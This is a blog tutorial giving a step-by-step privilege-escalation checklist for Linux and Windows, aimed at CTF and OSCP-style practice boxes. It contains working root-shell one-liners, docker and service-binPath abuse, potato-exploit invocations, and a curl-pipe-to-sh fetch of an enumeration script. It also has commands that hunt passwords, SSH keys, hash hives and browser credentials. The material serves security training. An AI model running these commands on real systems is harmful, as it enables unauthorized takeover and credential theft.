Privilege Escalation

Published by Doomsknight · KnightSec Reading time: ~15 minutes

Introduction

If you've ever sat staring at a low-priv shell wondering "now what?", this post is for you.

Privilege escalation is the art of turning a foothold into ownership. It's where most CTF players (and honestly, most pentesters) get stuck. The trick isn't memorizing every CVE, it's having a methodical checklist you can run top-down, knowing the cheap, common wins come first and the noisy kernel exploits come dead last.

What follows is the exact mental model I use on every box. Work through it in order. Don't skip steps because you "feel" the answer is somewhere else, discipline beats intuition here.

🐧 Part 1: Linux Privilege Escalation

0. First Thing: Get a Stable Shell

Before anything else, upgrade your shell. A broken reverse shell where Ctrl+C kills your session and tab-completion doesn't work will cost you hours. Fix it now.

BASH

python3 -c 'import pty; pty.spawn("/bin/bash")'
# then Ctrl+Z
stty raw -echo; fg
export TERM=xterm

1. System & Kernel Enumeration

BASH

uname -a                  # kernel version
cat /etc/os-release       # distro
arch                      # 32 vs 64 bit
hostname

Note the kernel version and check exploit-db or run searchsploit linux kernel <version>. But, and this is important, don't lead with kernel exploits. They're noisy, can crash the box, and reset your progress. Save them for last.

2. User Context (always start here)

BASH

id
whoami
groups
sudo -l                   # ★ huge: check NOPASSWD entries
cat /etc/passwd | grep -v nologin
cat /etc/group

If sudo -l shows any binary, your next stop is GTFOBins (https://gtfobins.github.io). That site alone solves a startling percentage of easy/medium boxes.

Watch out for these groups: docker, lxd, disk, adm, video, sudo, wheel, each has a known abuse path.

3. SUID / SGID Binaries

BASH

find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null

Cross-reference each non-default binary with GTFOBins. Standard ones (passwd, su, mount, ping) are usually safe. The interesting ones, find, nmap, vim, python, or anything custom, are gold.

4. Linux Capabilities

BASH

getcap -r / 2>/dev/null

cap_setuid+ep on python, perl, or ruby is an instant root. Example:

BASH

python -c 'import os; os.setuid(0); os.system("/bin/sh")'

5. Cron Jobs

BASH

cat /etc/crontab
ls -la /etc/cron.*
crontab -l
cat /var/spool/cron/crontabs/* 2>/dev/null

Look for writable scripts run by root. Two specific patterns to hunt for: PATH manipulation in crontab and wildcard issues (e.g. tar * in a writable dir, a classic).

6. Writable Files & PATH Hijacking

BASH

find / -writable -type d 2>/dev/null            # writable dirs
find / -perm -o+w -type f 2>/dev/null           # world-writable files
echo $PATH

If a script run by root calls a binary by name (no full path), and any earlier $PATH entry is writable, drop a malicious binary there. Done.

7. Credentials & Secrets Hunting

BASH

cat ~/.bash_history
cat /home/*/.bash_history 2>/dev/null
grep -r -i "password" /etc/ 2>/dev/null
grep -r -i "passwd" /var/www/ 2>/dev/null
find / -name "*.conf" -readable 2>/dev/null
find / -name "id_rsa*" 2>/dev/null
find / -name "*.kdbx" 2>/dev/null               # KeePass DBs
cat /etc/fstab                                  # mount creds sometimes here

Always check web roots: /var/www/html, /opt/, /srv/ for DB creds and config files. Files like mysql_history, psql_history, and .viminfo often leak commands with passwords still in them.

8. SSH Keys

BASH

ls -la ~/.ssh /home/*/.ssh /root/.ssh 2>/dev/null
find / -name "authorized_keys" 2>/dev/null
find / -name "id_rsa" 2>/dev/null

A world-readable private key is direct lateral or vertical movement.

9. NFS Mounts

BASH

cat /etc/exports
showmount -e <target>          # from attacker box

no_root_squash → mount the share as root locally and drop a SUID binary. Easy win when it shows up.

10. Docker / LXD Group

docker group: docker run -v /:/mnt --rm -it alpine chroot /mnt sh → root.
lxd group: Import an Alpine image and mount / as a shared device.

11. Sudo Misconfigurations / Version

BASH

sudo --version

Old sudo (< 1.8.28) → CVE-2019-14287 (sudo -u#-1).
sudo 1.8.2–1.9.5p1 → CVE-2021-3156 (Baron Samedit, heap overflow).
Env preservation: LD_PRELOAD, LD_LIBRARY_PATH if env_keep is set.

12. Services & Processes

BASH

ps auxf
ps -ef | grep root
netstat -tulnp 2>/dev/null
ss -tulnp

Internal services bound to 127.0.0.1 are often the path. Port-forward them and have a look.

13. Automated Enumeration (run ONE then verify manually)

LinPEAS: curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
linux-exploit-suggester: ./les.sh
pspy (passive process snooping, finds cron without read access): ./pspy64

🪟 Part 2: Windows Privilege Escalation

Windows priv-esc has a different rhythm. Where Linux rewards reading config files, Windows rewards reading token privileges and service ACLs. Start there.

1. Baseline Enumeration

CMD

whoami /all
whoami /priv
whoami /groups
systeminfo
hostname
net user
net localgroup administrators

2. Token Privileges (★ check first, biggest wins)

Look at whoami /priv for any of these:

Privilege	Exploit
`SeImpersonatePrivilege`	JuicyPotato / PrintSpoofer / GodPotato / RoguePotato
`SeAssignPrimaryToken`	Same potato family
`SeBackupPrivilege`	Read SAM/SYSTEM hives → dump hashes
`SeRestorePrivilege`	Overwrite system files
`SeTakeOwnership`	Take ownership of sensitive files
`SeDebugPrivilege`	Inject into SYSTEM processes
`SeLoadDriver`	Load malicious driver

If you're a service account (IIS APPPOOL\*, NT SERVICE\*, mssql-svc) → almost always SeImpersonate → PrintSpoofer is the modern go-to.

CMD

PrintSpoofer.exe -i -c cmd
GodPotato.exe -cmd "cmd /c whoami"

3. Unquoted Service Paths

CMD

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

If the path is C:\Program Files\Some Folder\service.exe (unquoted, with spaces) and any parent dir is writable → drop Program.exe.

4. Service Permissions

CMD

accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv "Users" *

SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG on a service → modify binPath to your payload, restart.

CMD

sc config <service> binPath= "C:\path\to\rev.exe"
sc start <service>

5. AlwaysInstallElevated

CMD

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Both = 0x1 → craft an MSI with msfvenom, run msiexec /quiet /qn /i evil.msi → SYSTEM.

6. Stored Credentials

CMD

cmdkey /list
runas /savecred /user:ADMIN cmd
dir /a:h /s C:\Users\*.kdbx 2>nul
findstr /si "password" *.xml *.ini *.txt *.config 2>nul

Two unsexy but reliable hunting spots:

Unattend.xml, sysprep.xml, Autounattend.xml in C:\Windows\Panther\ often contain base64'd admin passwords.
C:\Windows\System32\config\RegBack\, backup hives sometimes left readable.

7. Registry Autoruns & Writable Keys

CMD

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run

If a Run entry points to a writable binary → replace it.

8. Scheduled Tasks

CMD

schtasks /query /fo LIST /v

Look for tasks running as a higher-priv user with writable script paths.

9. DLL Hijacking

Use Process Monitor (or look at imports) → find a process searching for a missing DLL in a writable location → drop your DLL there.

10. Saved Browser / App Creds

Firefox: key4.db + logins.json → decrypt with firefox_decrypt.py.
WinSCP, FileZilla, PuTTY (HKCU\Software\SimonTatham\PuTTY\Sessions) all leak creds.

11. Automated Enumeration

WinPEAS: winPEASx64.exe
PowerUp: Import-Module PowerUp.ps1; Invoke-AllChecks
Seatbelt: Seatbelt.exe -group=all
Watson: patch-level missing exploits (Win 7/Server 2008 era).

12. Kernel / Patch Exploits (last resort)

CMD

systeminfo > sysinfo.txt

Feed to Windows Exploit Suggester (WES-NG) offline. Common hits: Juicy Potato (≤ Server 2016), MS16-032, MS17-010 (yes, sometimes still on HTB easy boxes), PrintNightmare (CVE-2021-34527).

📚 Reference Cheatsheets: Bookmark These

Resource	URL
GTFOBins (Linux)	https://gtfobins.github.io
LOLBAS (Windows)	https://lolbas-project.github.io
HackTricks	https://book.hacktricks.xyz
PayloadsAllTheThings	https://github.com/swisskyrepo/PayloadsAllTheThings
PEASS-ng	https://github.com/peass-ng/PEASS-ng

🎯 General Methodology: The Six Rules

Get a stable shell first. Don't enumerate from a broken reverse shell.
Manual enumeration before automated. sudo -l, id, whoami /priv, these alone solve 60% of easy/medium boxes.
One automated tool, then verify. Run LinPEAS/WinPEAS, but read the output, don't blindly trust the red highlights.
Pivot through internal services. A service bound to 127.0.0.1 that you can hit is often the answer.
Document credentials as you find them. A user password often gets reused for sudo, su, SSH, or admin services.
If stuck for >30 min: re-enumerate as the new user. Every shell context is a new enumeration cycle.

Closing Thoughts

Privilege escalation is less about being clever and more about being thorough. The boxes that crush you aren't the ones with obscure exploits, they're the ones where you skipped step 2 because you assumed it'd be empty.

Run the checklist. Trust the process. The root flag will follow.

If this helped, share it with someone who's grinding through their first OSCP-style box. And if you spot a technique I've missed, drop me a note. This list grows every time I learn something new.

- Doomsknight

Have feedback or want to discuss a technique? Reach out via WhatsApp, +1 (347) 260-3596.